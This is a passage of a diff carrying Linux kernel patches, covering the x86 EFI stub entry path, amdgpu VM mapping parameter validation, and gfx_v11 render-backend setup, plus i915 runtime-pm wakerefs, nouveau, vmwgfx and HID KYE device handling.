+ 	efi_status_t status;
+@@ -449,57 +457,25 @@ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 		efi_exit(handle, status);
+ 	}
+ 
+-	image_base = efi_table_attr(image, image_base);
+-
+-	status = efi_allocate_pages(sizeof(struct boot_params),
+-				    (unsigned long *)&boot_params, ULONG_MAX);
+-	if (status != EFI_SUCCESS) {
+-		efi_err("Failed to allocate lowmem for boot params\n");
+-		efi_exit(handle, status);
+-	}
+-
+-	memset(boot_params, 0x0, sizeof(struct boot_params));
+-
+-	hdr = &boot_params->hdr;
+-
+-	/* Copy the setup header from the second sector to boot_params */
+-	memcpy(&hdr->jump, image_base + 512,
+-	       sizeof(struct setup_header) - offsetof(struct setup_header, jump));
+-
+-	/*
+-	 * Fill out some of the header fields ourselves because the
+-	 * EFI firmware loader doesn't load the first sector.
+-	 */
++	/* Assign the setup_header fields that the kernel actually cares about */
+ 	hdr->root_flags	= 1;
+ 	hdr->vid_mode	= 0xffff;
+-	hdr->boot_flag	= 0xAA55;
+ 
+ 	hdr->type_of_loader = 0x21;
++	hdr->initrd_addr_max = INT_MAX;
+ 
+ 	/* Convert unicode cmdline to ascii */
+ 	cmdline_ptr = efi_convert_cmdline(image, &options_size);
+ 	if (!cmdline_ptr)
+ 		goto fail;
+ 
+-	efi_set_u64_split((unsigned long)cmdline_ptr,
+-			  &hdr->cmd_line_ptr, &boot_params->ext_cmd_line_ptr);
+-
+-	hdr->ramdisk_image = 0;
+-	hdr->ramdisk_size = 0;
++	efi_set_u64_split((unsigned long)cmdline_ptr, &hdr->cmd_line_ptr,
++			  &boot_params.ext_cmd_line_ptr);
+ 
+-	/*
+-	 * Disregard any setup data that was provided by the bootloader:
+-	 * setup_data could be pointing anywhere, and we have no way of
+-	 * authenticating or validating the payload.
+-	 */
+-	hdr->setup_data = 0;
+-
+-	efi_stub_entry(handle, sys_table_arg, boot_params);
++	efi_stub_entry(handle, sys_table_arg, &boot_params);
+ 	/* not reached */
+ 
+ fail:
+-	efi_free(sizeof(struct boot_params), (unsigned long)boot_params);
+-
+ 	efi_exit(handle, status);
+ }
+ 
+@@ -811,7 +787,7 @@ static efi_status_t efi_decompress_kernel(unsigned long *kernel_entry)
+ 
+ 	*kernel_entry = addr + entry;
+ 
+-	return efi_adjust_memory_range_protection(addr, kernel_total_size);
++	return efi_adjust_memory_range_protection(addr, kernel_text_size);
+ }
+ 
+ static void __noreturn enter_kernel(unsigned long kernel_addr,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+index 4c661e024e13d..49a47807c42d6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+@@ -1400,6 +1400,37 @@ static void amdgpu_vm_bo_insert_map(struct amdgpu_device *adev,
+ 	trace_amdgpu_vm_bo_map(bo_va, mapping);
+ }
+ 
++/* Validate operation parameters to prevent potential abuse */
++static int amdgpu_vm_verify_parameters(struct amdgpu_device *adev,
++					  struct amdgpu_bo *bo,
++					  uint64_t saddr,
++					  uint64_t offset,
++					  uint64_t size)
++{
++	uint64_t tmp, lpfn;
++
++	if (saddr & AMDGPU_GPU_PAGE_MASK
++	    || offset & AMDGPU_GPU_PAGE_MASK
++	    || size & AMDGPU_GPU_PAGE_MASK)
++		return -EINVAL;
++
++	if (check_add_overflow(saddr, size, &tmp)
++	    || check_add_overflow(offset, size, &tmp)
++	    || size == 0 /* which also leads to end < begin */)
++		return -EINVAL;
++
++	/* make sure object fit at this offset */
++	if (bo && offset + size > amdgpu_bo_size(bo))
++		return -EINVAL;
++
++	/* Ensure last pfn not exceed max_pfn */
++	lpfn = (saddr + size - 1) >> AMDGPU_GPU_PAGE_SHIFT;
++	if (lpfn >= adev->vm_manager.max_pfn)
++		return -EINVAL;
++
++	return 0;
++}
++
+ /**
+  * amdgpu_vm_bo_map - map bo inside a vm
+  *
+@@ -1426,21 +1457,14 @@ int amdgpu_vm_bo_map(struct amdgpu_device *adev,
+ 	struct amdgpu_bo *bo = bo_va->base.bo;
+ 	struct amdgpu_vm *vm = bo_va->base.vm;
+ 	uint64_t eaddr;
++	int r;
+ 
+-	/* validate the parameters */
+-	if (saddr & ~PAGE_MASK || offset & ~PAGE_MASK || size & ~PAGE_MASK)
+-		return -EINVAL;
+-	if (saddr + size <= saddr || offset + size <= offset)
+-		return -EINVAL;
+-
+-	/* make sure object fit at this offset */
+-	eaddr = saddr + size - 1;
+-	if ((bo && offset + size > amdgpu_bo_size(bo)) ||
+-	    (eaddr >= adev->vm_manager.max_pfn << AMDGPU_GPU_PAGE_SHIFT))
+-		return -EINVAL;
++	r = amdgpu_vm_verify_parameters(adev, bo, saddr, offset, size);
++	if (r)
++		return r;
+ 
+ 	saddr /= AMDGPU_GPU_PAGE_SIZE;
+-	eaddr /= AMDGPU_GPU_PAGE_SIZE;
++	eaddr = saddr + (size - 1) / AMDGPU_GPU_PAGE_SIZE;
+ 
+ 	tmp = amdgpu_vm_it_iter_first(&vm->va, saddr, eaddr);
+ 	if (tmp) {
+@@ -1493,17 +1517,9 @@ int amdgpu_vm_bo_replace_map(struct amdgpu_device *adev,
+ 	uint64_t eaddr;
+ 	int r;
+ 
+-	/* validate the parameters */
+-	if (saddr & ~PAGE_MASK || offset & ~PAGE_MASK || size & ~PAGE_MASK)
+-		return -EINVAL;
+-	if (saddr + size <= saddr || offset + size <= offset)
+-		return -EINVAL;
+-
+-	/* make sure object fit at this offset */
+-	eaddr = saddr + size - 1;
+-	if ((bo && offset + size > amdgpu_bo_size(bo)) ||
+-	    (eaddr >= adev->vm_manager.max_pfn << AMDGPU_GPU_PAGE_SHIFT))
+-		return -EINVAL;
++	r = amdgpu_vm_verify_parameters(adev, bo, saddr, offset, size);
++	if (r)
++		return r;
+ 
+ 	/* Allocate all the needed memory */
+ 	mapping = kmalloc(sizeof(*mapping), GFP_KERNEL);
+@@ -1517,7 +1533,7 @@ int amdgpu_vm_bo_replace_map(struct amdgpu_device *adev,
+ 	}
+ 
+ 	saddr /= AMDGPU_GPU_PAGE_SIZE;
+-	eaddr /= AMDGPU_GPU_PAGE_SIZE;
++	eaddr = saddr + (size - 1) / AMDGPU_GPU_PAGE_SIZE;
+ 
+ 	mapping->start = saddr;
+ 	mapping->last = eaddr;
+@@ -1604,10 +1620,14 @@ int amdgpu_vm_bo_clear_mappings(struct amdgpu_device *adev,
+ 	struct amdgpu_bo_va_mapping *before, *after, *tmp, *next;
+ 	LIST_HEAD(removed);
+ 	uint64_t eaddr;
++	int r;
++
++	r = amdgpu_vm_verify_parameters(adev, NULL, saddr, 0, size);
++	if (r)
++		return r;
+ 
+-	eaddr = saddr + size - 1;
+ 	saddr /= AMDGPU_GPU_PAGE_SIZE;
+-	eaddr /= AMDGPU_GPU_PAGE_SIZE;
++	eaddr = saddr + (size - 1) / AMDGPU_GPU_PAGE_SIZE;
+ 
+ 	/* Allocate all the needed memory */
+ 	before = kzalloc(sizeof(*before), GFP_KERNEL);
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 66a6f7a37ebcf..5a5787bfbce7f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -1531,44 +1531,70 @@ static void gfx_v11_0_select_se_sh(struct amdgpu_device *adev, u32 se_num,
+ 	WREG32_SOC15(GC, 0, regGRBM_GFX_INDEX, data);
+ }
+ 
+-static u32 gfx_v11_0_get_rb_active_bitmap(struct amdgpu_device *adev)
++static u32 gfx_v11_0_get_sa_active_bitmap(struct amdgpu_device *adev)
+ {
+-	u32 data, mask;
++	u32 gc_disabled_sa_mask, gc_user_disabled_sa_mask, sa_mask;
++
++	gc_disabled_sa_mask = RREG32_SOC15(GC, 0, regCC_GC_SA_UNIT_DISABLE);
++	gc_disabled_sa_mask = REG_GET_FIELD(gc_disabled_sa_mask,
++					   CC_GC_SA_UNIT_DISABLE,
++					   SA_DISABLE);
++	gc_user_disabled_sa_mask = RREG32_SOC15(GC, 0, regGC_USER_SA_UNIT_DISABLE);
++	gc_user_disabled_sa_mask = REG_GET_FIELD(gc_user_disabled_sa_mask,
++						 GC_USER_SA_UNIT_DISABLE,
++						 SA_DISABLE);
++	sa_mask = amdgpu_gfx_create_bitmask(adev->gfx.config.max_sh_per_se *
++					    adev->gfx.config.max_shader_engines);
+ 
+-	data = RREG32_SOC15(GC, 0, regCC_RB_BACKEND_DISABLE);
+-	data |= RREG32_SOC15(GC, 0, regGC_USER_RB_BACKEND_DISABLE);
++	return sa_mask & (~(gc_disabled_sa_mask | gc_user_disabled_sa_mask));
++}
+ 
+-	data &= CC_RB_BACKEND_DISABLE__BACKEND_DISABLE_MASK;
+-	data >>= GC_USER_RB_BACKEND_DISABLE__BACKEND_DISABLE__SHIFT;
++static u32 gfx_v11_0_get_rb_active_bitmap(struct amdgpu_device *adev)
++{
++	u32 gc_disabled_rb_mask, gc_user_disabled_rb_mask;
++	u32 rb_mask;
+ 
+-	mask = amdgpu_gfx_create_bitmask(adev->gfx.config.max_backends_per_se /
+-					 adev->gfx.config.max_sh_per_se);
++	gc_disabled_rb_mask = RREG32_SOC15(GC, 0, regCC_RB_BACKEND_DISABLE);
++	gc_disabled_rb_mask = REG_GET_FIELD(gc_disabled_rb_mask,
++					    CC_RB_BACKEND_DISABLE,
++					    BACKEND_DISABLE);
++	gc_user_disabled_rb_mask = RREG32_SOC15(GC, 0, regGC_USER_RB_BACKEND_DISABLE);
++	gc_user_disabled_rb_mask = REG_GET_FIELD(gc_user_disabled_rb_mask,
++						 GC_USER_RB_BACKEND_DISABLE,
++						 BACKEND_DISABLE);
++	rb_mask = amdgpu_gfx_create_bitmask(adev->gfx.config.max_backends_per_se *
++					    adev->gfx.config.max_shader_engines);
+ 
+-	return (~data) & mask;
++	return rb_mask & (~(gc_disabled_rb_mask | gc_user_disabled_rb_mask));
+ }
+ 
+ static void gfx_v11_0_setup_rb(struct amdgpu_device *adev)
+ {
+-	int i, j;
+-	u32 data;
+-	u32 active_rbs = 0;
+-	u32 rb_bitmap_width_per_sh = adev->gfx.config.max_backends_per_se /
+-					adev->gfx.config.max_sh_per_se;
++	u32 rb_bitmap_width_per_sa;
++	u32 max_sa;
++	u32 active_sa_bitmap;
++	u32 global_active_rb_bitmap;
++	u32 active_rb_bitmap = 0;
++	u32 i;
+ 
+-	mutex_lock(&adev->grbm_idx_mutex);
+-	for (i = 0; i < adev->gfx.config.max_shader_engines; i++) {
+-		for (j = 0; j < adev->gfx.config.max_sh_per_se; j++) {
+-			gfx_v11_0_select_se_sh(adev, i, j, 0xffffffff);
+-			data = gfx_v11_0_get_rb_active_bitmap(adev);
+-			active_rbs |= data << ((i * adev->gfx.config.max_sh_per_se + j) *
+-					       rb_bitmap_width_per_sh);
+-		}
++	/* query sa bitmap from SA_UNIT_DISABLE registers */
++	active_sa_bitmap = gfx_v11_0_get_sa_active_bitmap(adev);
++	/* query rb bitmap from RB_BACKEND_DISABLE registers */
++	global_active_rb_bitmap = gfx_v11_0_get_rb_active_bitmap(adev);
++
++	/* generate active rb bitmap according to active sa bitmap */
++	max_sa = adev->gfx.config.max_shader_engines *
++		 adev->gfx.config.max_sh_per_se;
++	rb_bitmap_width_per_sa = adev->gfx.config.max_backends_per_se /
++				 adev->gfx.config.max_sh_per_se;
++	for (i = 0; i < max_sa; i++) {
++		if (active_sa_bitmap & (1 << i))
++			active_rb_bitmap |= (0x3 << (i * rb_bitmap_width_per_sa));
+ 	}
+-	gfx_v11_0_select_se_sh(adev, 0xffffffff, 0xffffffff, 0xffffffff);
+-	mutex_unlock(&adev->grbm_idx_mutex);
+ 
+-	adev->gfx.config.backend_enable_mask = active_rbs;
+-	adev->gfx.config.num_rbs = hweight32(active_rbs);
++	active_rb_bitmap &= global_active_rb_bitmap;
++	adev->gfx.config.backend_enable_mask = active_rb_bitmap;
++	adev->gfx.config.num_rbs = hweight32(active_rb_bitmap);
+ }
+ 
+ #define DEFAULT_SH_MEM_BASES	(0x6000)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
+index a974f86e718a8..37c645a882dd8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
+@@ -216,9 +216,6 @@ static void optc32_setup_manual_trigger(struct timing_generator *optc)
+ 				OTG_V_TOTAL_MAX_SEL, 1,
+ 				OTG_FORCE_LOCK_ON_EVENT, 0,
+ 				OTG_SET_V_TOTAL_MIN_MASK, (1 << 1)); /* TRIGA */
+-
+-		// Setup manual flow control for EOF via TRIG_A
+-		optc->funcs->setup_manual_trigger(optc);
+ 	}
+ }
+ 
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 3fe5e6439c401..aa93129c3397e 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -348,6 +348,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "IdeaPad Duet 3 10IGL5"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Lenovo Legion Go 8APU1 */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "Legion Go 8APU1"),
++		},
++		.driver_data = (void *)&lcd1600x2560_leftside_up,
+ 	}, {	/* Lenovo Yoga Book X90F / X90L */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
+diff --git a/drivers/gpu/drm/i915/i915_vma.c b/drivers/gpu/drm/i915/i915_vma.c
+index c8ad8f37e5cfe..58a03da16a10f 100644
+--- a/drivers/gpu/drm/i915/i915_vma.c
++++ b/drivers/gpu/drm/i915/i915_vma.c
+@@ -32,6 +32,7 @@
+ #include "gt/intel_engine.h"
+ #include "gt/intel_engine_heartbeat.h"
+ #include "gt/intel_gt.h"
++#include "gt/intel_gt_pm.h"
+ #include "gt/intel_gt_requests.h"
+ 
+ #include "i915_drv.h"
+@@ -98,12 +99,34 @@ static inline struct i915_vma *active_to_vma(struct i915_active *ref)
+ 
+ static int __i915_vma_active(struct i915_active *ref)
+ {
+-	return i915_vma_tryget(active_to_vma(ref)) ? 0 : -ENOENT;
++	struct i915_vma *vma = active_to_vma(ref);
++
++	if (!i915_vma_tryget(vma))
++		return -ENOENT;
++
++	/*
++	 * Exclude global GTT VMA from holding a GT wakeref
++	 * while active, otherwise GPU never goes idle.
++	 */
++	if (!i915_vma_is_ggtt(vma))
++		intel_gt_pm_get(vma->vm->gt);
++
++	return 0;
+ }
+ 
+ static void __i915_vma_retire(struct i915_active *ref)
+ {
+-	i915_vma_put(active_to_vma(ref));
++	struct i915_vma *vma = active_to_vma(ref);
++
++	if (!i915_vma_is_ggtt(vma)) {
++		/*
++		 * Since we can be called from atomic contexts,
++		 * use an async variant of intel_gt_pm_put().
++		 */
++		intel_gt_pm_put_async(vma->vm->gt);
++	}
++
++	i915_vma_put(vma);
+ }
+ 
+ static struct i915_vma *
+@@ -1365,7 +1388,7 @@ int i915_vma_pin_ww(struct i915_vma *vma, struct i915_gem_ww_ctx *ww,
+ 	struct i915_vma_work *work = NULL;
+ 	struct dma_fence *moving = NULL;
+ 	struct i915_vma_resource *vma_res = NULL;
+-	intel_wakeref_t wakeref = 0;
++	intel_wakeref_t wakeref;
+ 	unsigned int bound;
+ 	int err;
+ 
+@@ -1385,8 +1408,14 @@ int i915_vma_pin_ww(struct i915_vma *vma, struct i915_gem_ww_ctx *ww,
+ 	if (err)
+ 		return err;
+ 
+-	if (flags & PIN_GLOBAL)
+-		wakeref = intel_runtime_pm_get(&vma->vm->i915->runtime_pm);
++	/*
++	 * In case of a global GTT, we must hold a runtime-pm wakeref
++	 * while global PTEs are updated.  In other cases, we hold
++	 * the rpm reference while the VMA is active.  Since runtime
++	 * resume may require allocations, which are forbidden inside
++	 * vm->mutex, get the first rpm wakeref outside of the mutex.
++	 */
++	wakeref = intel_runtime_pm_get(&vma->vm->i915->runtime_pm);
+ 
+ 	if (flags & vma->vm->bind_async_flags) {
+ 		/* lock VM */
+@@ -1522,8 +1551,7 @@ int i915_vma_pin_ww(struct i915_vma *vma, struct i915_gem_ww_ctx *ww,
+ 	if (work)
+ 		dma_fence_work_commit_imm(&work->base);
+ err_rpm:
+-	if (wakeref)
+-		intel_runtime_pm_put(&vma->vm->i915->runtime_pm, wakeref);
++	intel_runtime_pm_put(&vma->vm->i915->runtime_pm, wakeref);
+ 
+ 	if (moving)
+ 		dma_fence_put(moving);
+diff --git a/drivers/gpu/drm/nouveau/nouveau_bios.c b/drivers/gpu/drm/nouveau/nouveau_bios.c
+index 189903b65edc9..48cf593383b34 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_bios.c
++++ b/drivers/gpu/drm/nouveau/nouveau_bios.c
+@@ -23,6 +23,7 @@
+  */
+ 
+ #include "nouveau_drv.h"
++#include "nouveau_bios.h"
+ #include "nouveau_reg.h"
+ #include "dispnv04/hw.h"
+ #include "nouveau_encoder.h"
+@@ -1675,7 +1676,7 @@ apply_dcb_encoder_quirks(struct drm_device *dev, int idx, u32 *conn, u32 *conf)
+ 	 */
+ 	if (nv_match_device(dev, 0x0201, 0x1462, 0x8851)) {
+ 		if (*conn == 0xf2005014 && *conf == 0xffffffff) {
+-			fabricate_dcb_output(dcb, DCB_OUTPUT_TMDS, 1, 1, 1);
++			fabricate_dcb_output(dcb, DCB_OUTPUT_TMDS, 1, 1, DCB_OUTPUT_B);
+ 			return false;
+ 		}
+ 	}
+@@ -1761,26 +1762,26 @@ fabricate_dcb_encoder_table(struct drm_device *dev, struct nvbios *bios)
+ #ifdef __powerpc__
+ 	/* Apple iMac G4 NV17 */
+ 	if (of_machine_is_compatible("PowerMac4,5")) {
+-		fabricate_dcb_output(dcb, DCB_OUTPUT_TMDS, 0, all_heads, 1);
+-		fabricate_dcb_output(dcb, DCB_OUTPUT_ANALOG, 1, all_heads, 2);
++		fabricate_dcb_output(dcb, DCB_OUTPUT_TMDS, 0, all_heads, DCB_OUTPUT_B);
++		fabricate_dcb_output(dcb, DCB_OUTPUT_ANALOG, 1, all_heads, DCB_OUTPUT_C);
+ 		return;
+ 	}
+ #endif
+ 
+ 	/* Make up some sane defaults */
+ 	fabricate_dcb_output(dcb, DCB_OUTPUT_ANALOG,
+-			     bios->legacy.i2c_indices.crt, 1, 1);
++			     bios->legacy.i2c_indices.crt, 1, DCB_OUTPUT_B);
+ 
+ 	if (nv04_tv_identify(dev, bios->legacy.i2c_indices.tv) >= 0)
+ 		fabricate_dcb_output(dcb, DCB_OUTPUT_TV,
+ 				     bios->legacy.i2c_indices.tv,
+-				     all_heads, 0);
++				     all_heads, DCB_OUTPUT_A);
+ 
+ 	else if (bios->tmds.output0_script_ptr ||
+ 		 bios->tmds.output1_script_ptr)
+ 		fabricate_dcb_output(dcb, DCB_OUTPUT_TMDS,
+ 				     bios->legacy.i2c_indices.panel,
+-				     all_heads, 1);
++				     all_heads, DCB_OUTPUT_B);
+ }
+ 
+ static int
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/instmem/nv50.c b/drivers/gpu/drm/nouveau/nvkm/subdev/instmem/nv50.c
+index c51bac76174c1..9fe5b6a36ab98 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/instmem/nv50.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/instmem/nv50.c
+@@ -221,8 +221,11 @@ nv50_instobj_acquire(struct nvkm_memory *memory)
+ 	void __iomem *map = NULL;
+ 
+ 	/* Already mapped? */
+-	if (refcount_inc_not_zero(&iobj->maps))
++	if (refcount_inc_not_zero(&iobj->maps)) {
++		/* read barrier match the wmb on refcount set */
++		smp_rmb();
+ 		return iobj->map;
++	}
+ 
+ 	/* Take the lock, and re-check that another thread hasn't
+ 	 * already mapped the object in the meantime.
+@@ -249,6 +252,8 @@ nv50_instobj_acquire(struct nvkm_memory *memory)
+ 			iobj->base.memory.ptrs = &nv50_instobj_fast;
+ 		else
+ 			iobj->base.memory.ptrs = &nv50_instobj_slow;
++		/* barrier to ensure the ptrs are written before refcount is set */
++		smp_wmb();
+ 		refcount_set(&iobj->maps, 1);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/panel/panel-visionox-rm69299.c b/drivers/gpu/drm/panel/panel-visionox-rm69299.c
+index ec228c269146f..b380bbb0e0d0a 100644
+--- a/drivers/gpu/drm/panel/panel-visionox-rm69299.c
++++ b/drivers/gpu/drm/panel/panel-visionox-rm69299.c
+@@ -261,8 +261,6 @@ static void visionox_rm69299_remove(struct mipi_dsi_device *dsi)
+ 	struct visionox_rm69299 *ctx = mipi_dsi_get_drvdata(dsi);
+ 
+ 	mipi_dsi_detach(ctx->dsi);
+-	mipi_dsi_device_unregister(ctx->dsi);
+-
+ 	drm_panel_remove(&ctx->panel);
+ }
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+index 9d7a1b710f48f..53f63ad656a41 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+@@ -663,11 +663,12 @@ static int vmw_dma_select_mode(struct vmw_private *dev_priv)
+ 		[vmw_dma_map_populate] = "Caching DMA mappings.",
+ 		[vmw_dma_map_bind] = "Giving up DMA mappings early."};
+ 
+-	/* TTM currently doesn't fully support SEV encryption. */
+-	if (cc_platform_has(CC_ATTR_MEM_ENCRYPT))
+-		return -EINVAL;
+-
+-	if (vmw_force_coherent)
++	/*
++	 * When running with SEV we always want dma mappings, because
++	 * otherwise ttm tt pool pages will bounce through swiotlb running
++	 * out of available space.
++	 */
++	if (vmw_force_coherent || cc_platform_has(CC_ATTR_MEM_ENCRYPT))
+ 		dev_priv->map_mode = vmw_dma_alloc_coherent;
+ 	else if (vmw_restrict_iommu)
+ 		dev_priv->map_mode = vmw_dma_map_bind;
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+index aa571b75cd07f..b1aed051b41ab 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+@@ -793,6 +793,7 @@ int vmw_du_cursor_plane_atomic_check(struct drm_plane *plane,
+ int vmw_du_crtc_atomic_check(struct drm_crtc *crtc,
+ 			     struct drm_atomic_state *state)
+ {
++	struct vmw_private *vmw = vmw_priv(crtc->dev);
+ 	struct drm_crtc_state *new_state = drm_atomic_get_new_crtc_state(state,
+ 									 crtc);
+ 	struct vmw_display_unit *du = vmw_crtc_to_du(new_state->crtc);
+@@ -800,9 +801,13 @@ int vmw_du_crtc_atomic_check(struct drm_crtc *crtc,
+ 	bool has_primary = new_state->plane_mask &
+ 			   drm_plane_mask(crtc->primary);
+ 
+-	/* We always want to have an active plane with an active CRTC */
+-	if (has_primary != new_state->enable)
+-		return -EINVAL;
++	/*
++	 * This is fine in general, but broken userspace might expect
++	 * some actual rendering so give a clue as why it's blank.
++	 */
++	if (new_state->enable && !has_primary)
++		drm_dbg_driver(&vmw->drm,
++			       "CRTC without a primary plane will be blank.\n");
+ 
+ 
+ 	if (new_state->connector_mask != connector_mask &&
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+index b02d2793659f9..b116600b343a8 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+@@ -246,10 +246,10 @@ struct vmw_framebuffer_bo {
+ 
+ 
+ static const uint32_t __maybe_unused vmw_primary_plane_formats[] = {
+-	DRM_FORMAT_XRGB1555,
+-	DRM_FORMAT_RGB565,
+ 	DRM_FORMAT_XRGB8888,
+ 	DRM_FORMAT_ARGB8888,
++	DRM_FORMAT_RGB565,
++	DRM_FORMAT_XRGB1555,
+ };
+ 
+ static const uint32_t __maybe_unused vmw_cursor_plane_formats[] = {
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 1be454bafcb91..405d88b08908d 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -717,10 +717,10 @@
+ #define USB_DEVICE_ID_KYE_GPEN_560	0x5003
+ #define USB_DEVICE_ID_KYE_EASYPEN_I405X	0x5010
+ #define USB_DEVICE_ID_KYE_MOUSEPEN_I608X	0x5011
+-#define USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2	0x501a
+ #define USB_DEVICE_ID_KYE_EASYPEN_M610X	0x5013
+ #define USB_DEVICE_ID_KYE_PENSKETCH_M912	0x5015
+ #define USB_DEVICE_ID_KYE_EASYPEN_M406XE	0x5019
++#define USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2	0x501A
+ 
+ #define USB_VENDOR_ID_LABTEC		0x1020
+ #define USB_DEVICE_ID_LABTEC_WIRELESS_KEYBOARD	0x0006
+diff --git a/drivers/hid/hid-kye.c b/drivers/hid/hid-kye.c
+index da903138eee49..dc57e9d4a3e20 100644
+--- a/drivers/hid/hid-kye.c
++++ b/drivers/hid/hid-kye.c
+@@ -602,6 +602,18 @@ static __u8 *kye_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 			rdesc[74] = 0x08;
+ 		}
+ 		break;
++	case USB_DEVICE_ID_GENIUS_GILA_GAMING_MOUSE:
++		rdesc = kye_consumer_control_fixup(hdev, rdesc, rsize, 104,
++					"Genius Gila Gaming Mouse");
++		break;
++	case USB_DEVICE_ID_GENIUS_MANTICORE:
++		rdesc = kye_consumer_control_fixup(hdev, rdesc, rsize, 104,
++					"Genius Manticore Keyboard");
++		break;
++	case USB_DEVICE_ID_GENIUS_GX_IMPERATOR:
++		rdesc = kye_consumer_control_fixup(hdev, rdesc, rsize, 83,
++					"Genius Gx Imperator Keyboard");
++		break;
+ 	case USB_DEVICE_ID_KYE_EASYPEN_I405X:
+ 		if (*rsize == EASYPEN_I405X_RDESC_ORIG_SIZE) {
+ 			rdesc = easypen_i405x_rdesc_fixed;
+@@ -638,18 +650,6 @@ static __u8 *kye_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 			*rsize = sizeof(pensketch_m912_rdesc_fixed);
+ 		}
+ 		break;
+-	case USB_DEVICE_ID_GENIUS_GILA_GAMING_MOUSE:
+-		rdesc = kye_consumer_control_fixup(hdev, rdesc, rsize, 104,
+-					"Genius Gila Gaming Mouse");
+-		break;
+-	case USB_DEVICE_ID_GENIUS_GX_IMPERATOR:
+-		rdesc = kye_consumer_control_fixup(hdev, rdesc, rsize, 83,
+-					"Genius Gx Imperator Keyboard");
+-		break;
+-	case USB_DEVICE_ID_GENIUS_MANTICORE:
+-		rdesc = kye_consumer_control_fixup(hdev, rdesc, rsize, 104,
+-					"Genius Manticore Keyboard");
+-		break;
+ 	}
+ 	return rdesc;
+ }
+@@ -717,26 +717,26 @@ static int kye_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	}
+ 
+ 	switch (id->product) {
++	case USB_DEVICE_ID_GENIUS_MANTICORE:
++		/*
++		 * The manticore keyboard needs to have all the interfaces
++		 * opened at least once to be fully functional.
++		 */
++		if (hid_hw_open(hdev))
++			hid_hw_close(hdev);
++		break;
+ 	case USB_DEVICE_ID_KYE_EASYPEN_I405X:
+ 	case USB_DEVICE_ID_KYE_MOUSEPEN_I608X:
+-	case USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2:
+ 	case USB_DEVICE_ID_KYE_EASYPEN_M610X:
+-	case USB_DEVICE_ID_KYE_EASYPEN_M406XE:
+ 	case USB_DEVICE_ID_KYE_PENSKETCH_M912:
++	case USB_DEVICE_ID_KYE_EASYPEN_M406XE:
++	case USB_DEVICE_ID_KYE_MOUSEPEN_I608X_V2:
+ 		ret = kye_tablet_enable(hdev);
+ 		if (ret) {
+ 			hid_err(hdev, "tablet enabling failed\n");
+ 			goto enabling_err;
+ 		}
+ 		break;
+-	case USB_DEVICE_ID_GENIUS_MANTICORE:
+-		/*
+-		 * The manticore keyboard needs to have all the interfaces
+-		 * opened at least once to be fully functional.
+-		 */
+-		if (hid_hw_open(hdev))
+-			hid_hw_close(hdev);
+-		break;
+ 	}
+ 
+ 	return 0;
+@@ -749,23 +749,23 @@ static int kye_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ static const struct hid_device_id kye_devices[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE, USB_DEVICE_ID_KYE_ERGO_525V) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_KYE_EASYPEN_I405X) },
++				USB_DEVICE_ID_GENIUS_GILA_GAMING_MOUSE) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
+-				USB_DEVICE_ID_KYE_MOUSEPEN_I608X) },
++				USB_DEVICE_ID_GENIUS_MANTICORE) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_KYE,
